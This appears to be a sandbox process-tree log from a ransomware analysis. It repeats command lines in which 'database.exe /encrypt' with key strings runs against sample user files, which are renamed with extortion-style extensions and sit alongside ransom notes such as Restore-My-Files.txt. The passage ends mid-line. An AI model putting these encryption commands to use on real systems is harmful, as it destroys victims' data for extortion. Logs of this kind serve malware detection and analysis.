C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7236
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7244
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7252
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7260
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\README_sTlLoTpq.hta.gif"5⤵PID:7268
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Restore-My-Files.txt"5⤵PID:7276
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7284
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7328
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\Restore-My-Files.txt"5⤵PID:7336
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\Sample Media\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7352
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\Sample Media\Restore-My-Files.txt"5⤵PID:7360
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.gif"5⤵PID:7368
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Videos\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7384
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Videos\Restore-My-Files.txt"5⤵PID:7392
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Videos\Sample Videos\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7408
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Videos\Sample Videos\Restore-My-Files.txt"5⤵PID:7420
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7428
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta"5⤵PID:7672
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta.gif"5⤵PID:7680
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7688
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\A8TfBlMc-hK4WM9cK.[[email protected]].gif"5⤵PID:7692
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AddGroup.mp4.sage.gif"5⤵PID:7704
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AssertExpand.css.sage.gif"5⤵PID:7712
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" 